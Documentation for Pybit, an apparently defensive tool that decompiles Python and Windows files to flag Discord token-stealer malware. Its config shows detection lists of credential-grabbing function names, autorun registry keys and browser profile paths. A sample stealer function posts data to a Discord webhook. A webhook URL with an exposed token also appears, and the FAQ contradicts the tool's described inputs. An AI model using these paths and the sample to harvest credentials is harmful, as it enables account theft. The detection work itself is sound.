Pybit Documentation

Features

  • Webhook Detection: Automatically detects Discord webhooks embedded within malicious code, alerting the user to potential threats.
  • Executable Analysis: Decompiles and analyzes Windows executables (.exe files), identifying hidden malware code that might otherwise be difficult to spot.
  • PYC File Decompiling: Decompiles .pyc files, often used in Python-based malware, to allow users to inspect malicious code and identify vulnerabilities.
  • User-Friendly Interface: Minimal user input required, providing easy-to-understand output and warnings that help mitigate security risks.
  • Fast Processing: Quickly scans files and outputs results, making it easy to scan multiple files in short bursts.
  • Security-Centered: Focused on detecting malicious behavior commonly associated with Discord malware, particularly related to webhook usage.

Getting Started

To get started with Pybit Scanner, download Python from python.org and follow the steps below.

// Installation

Download Python 3.11: https://www.python.org/downloads/release/python-3110/
                    

Git Clone

Next, clone the repo with git or download the zip.

// Git Clone 

git clone https://github.com/pyinstance/pybit.git
cd pybit
                    

Installing Modules

Next, navigate to the pybit folder, open a Command Prompt / Terminal, and run the following:

Module installation

 C:\Users\null\Desktop\> cd pybit

 C:\Users\null\Desktop\pybit\>  pip install -r assets/requirements.txt 
                    

Config Setup

After successfully installing all modules, move on to the config. Before running pybit, navigate to the 'pybit.py' file.


  • Find the variable called pybit on line 8. It should look something like this:

  • Config Setup
    pybit = "webhookurl_here"
                        
  • Replace the placeholder text 'webhookurl_here' with your actual webhook URL. Treat this URL as a secret: anyone who has it can post to that webhook.
  • It should look something like this:

  • Config Setup
    pybit = "https://discord.com/api/webhooks/1319395046696419328/eE5dBG5fWDmIzajnK4-D8brW-a_hUE9yOZ_fJ35YJJgrlqG7s7LdrP6CbuQeICV49N-i"
                        

  • Now head over to the config folder and make sure both of these files are located inside:
  • 'config.json'
  • 'path_rules.json'
  • If these files are present, proceed; if not, redownload pybit.

  • These should be the contents of both config files:
  • config.json contents
    
    {
        "SUSPICIOUS_CONSTANTS": [
            "WEBHOOK_URL",
            "webhook"
        ],
        "SUSPICIOUS_FUNCTIONS": [
            "injection",
            "Injection",
            "Inject",
            "inject",
            "vealol",
            "get_passwords",
            "get_system_info",
            "grabber",
            "grabTokens"
        ],
        "SUSPICIOUS_KEYWORDS": [
            "eval", "exec", "subprocess", "os.system", "import socket", "import requests",
            "import urllib", "open(", "os.popen", "getattr", "input(", "os.fork", "import ftplib"
        ],
        "SUSPICIOUS_REG_KEYS": [
            "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
            "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
            "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",
            "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services",
            "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts",
            "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks",
            "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment",
            "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",
            "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\FilePaths"
        ]
    }
                                   
                            

  • path_rules.json contents
    {
        "paths": {
            "Discord": "C:\\Users\\User\\AppData\\Roaming\\discord",
            "Discord Canary": "C:\\Users\\User\\AppData\\Roaming\\discordcanary",
            "Lightcord": "C:\\Users\\User\\AppData\\Roaming\\Lightcord",
            "Discord PTB": "C:\\Users\\User\\AppData\\Roaming\\discordptb",
            "Opera GX": "C:\\Users\\User\\AppData\\Roaming\\Opera Software\\Opera GX Stable",
            "Chrome": "C:\\Users\\User\\Local\\Google\\Chrome\\User Data\\Default",
            "Microsoft Edge": "C:\\Users\\User\\Local\\Microsoft\\Edge\\User Data\\Default",
            "Firefox": "C:\\Users\\User\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles",
            "Brave": "C:\\Users\\User\\Local\\BraveSoftware\\Brave-Browser\\User Data",
            "Safari": "C:\\Users\\User\\AppData\\Local\\Apple Computer\\Safari\\Safari",
            "Vivaldi": "C:\\Users\\User\\Local\\Vivaldi\\User Data",
            "Yandex": "C:\\Users\\User\\AppData\\Roaming\\Yandex\\YandexBrowser\\User Data",
            "Edge Legacy": "C:\\Users\\User\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE",
            "Epic Privacy Browser": "C:\\Users\\User\\Local\\Epic Privacy Browser\\User Data",
            "SlimJet": "C:\\Users\\User\\Local\\SlimJet\\User Data",
            "Comodo Dragon": "C:\\Users\\User\\Local\\Comodo\\Dragon\\User Data",
            "CyberFox": "C:\\Users\\User\\AppData\\Roaming\\CyberFox\\CyberFox\\Profiles",
            "Opera": "C:\\Users\\User\\AppData\\Roaming\\Opera Software\\Opera Stable"
        },
        "suspicious_directories": [
            "\\Google\\Chrome\\User Data", 
            "\\Opera Software\\Opera Stable",
            "\\Discord", 
            "\\DiscordCanary", 
            "\\Microsoft\\Edge",
            "\\Mozilla\\Firefox\\Profiles", 
            "\\BraveSoftware\\Brave-Browser\\User Data",
            "\\Apple Computer\\Safari", 
            "\\Vivaldi", 
            "\\Yandex",
            "\\Microsoft\\Windows\\INetCache\\IE", 
            "\\Epic Privacy Browser\\User Data",
            "\\SlimJet\\User Data", 
            "\\Comodo\\Dragon\\User Data", 
            "\\CyberFox\\CyberFox\\Profiles",
            "\\Opera Software\\Opera Stable"
        ]
    }
                                   
                            

  • Now you are ready to run pybit. Follow the steps below:

  • Running Pybit
        
         C:\Users\null\Desktop\> cd pybit
        
         C:\Users\null\Desktop\pybit\> python pybit.py 
        
                            
  • After this is done, a text prompt will show the following:

  • Running Pybit
    
    C:\Users\null\Desktop\pybit\> Drag and drop the .pyc file here: 
        
                            
  • After you drag your '.pyc' file into the program,
  • a summary will be sent to the Discord webhook you entered earlier
  • with everything that was decompiled and extracted from the '.pyc' file you dropped.
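
A minimal sketch of how rule lists like those in config.json and path_rules.json can be applied to decompiled source. This is an added example, not Pybit's own code; scan_source, WEBHOOK_RE, the webhook pattern and the sample input are assumptions made for illustration.

```python
import ast
import re

# Subset of the rule lists shown in config.json and path_rules.json.
RULES = {
    "SUSPICIOUS_FUNCTIONS": ["inject", "get_passwords", "grabber", "grabTokens"],
    "SUSPICIOUS_KEYWORDS": ["eval", "exec", "subprocess", "os.system", "import requests"],
    "suspicious_directories": ["\\Discord", "\\Google\\Chrome\\User Data"],
}

# Assumed pattern for Discord webhook URLs (not taken from Pybit).
WEBHOOK_RE = re.compile(
    r"https://(?:canary\.|ptb\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+"
)

# Constructed sample of decompiled stealer-style source; the webhook is a dummy value.
SAMPLE = r'''
import os
import requests
WEBHOOK_URL = "https://discord.com/api/webhooks/000000000000000000/EXAMPLE-TOKEN"
def grabTokens():
    base = os.getenv("APPDATA") + "\\Discord\\Local Storage"
    return requests.post(WEBHOOK_URL, json={"path": base})
'''

def scan_source(source, rules=RULES):
    """Return the findings for one decompiled Python source string."""
    findings = {"functions": [], "directories": []}
    findings["webhooks"] = sorted(set(WEBHOOK_RE.findall(source)))
    # Plain substring match: cheap, but noisy for short keywords such as "eval".
    findings["keywords"] = [k for k in rules["SUSPICIOUS_KEYWORDS"] if k in source]
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return findings  # partial decompiler output: keep the text-based findings
    wanted = [f.lower() for f in rules["SUSPICIOUS_FUNCTIONS"]]
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            if any(w in node.name.lower() for w in wanted):
                findings["functions"].append(node.name)
        # String constants hold paths after Python has processed the escapes.
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for d in rules["suspicious_directories"]:
                if d.lower() in node.value.lower() and d not in findings["directories"]:
                    findings["directories"].append(d)
    return findings

if __name__ == "__main__":
    print(scan_source(SAMPLE))
```

Function names and path strings are read from the parsed syntax tree, so they are not triggered by comments; the keyword list is matched as raw text and still works when the decompiler output does not parse.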

FAQ

    Q: What file types are supported?

    A: We support files with extensions .js, .html, .py, .java, .txt, and .exe (for .NET applications).

    Q: Can I search for specific keywords within the code?

    A: Yes! Our search functionality allows you to find and highlight specific words or patterns within the uploaded code.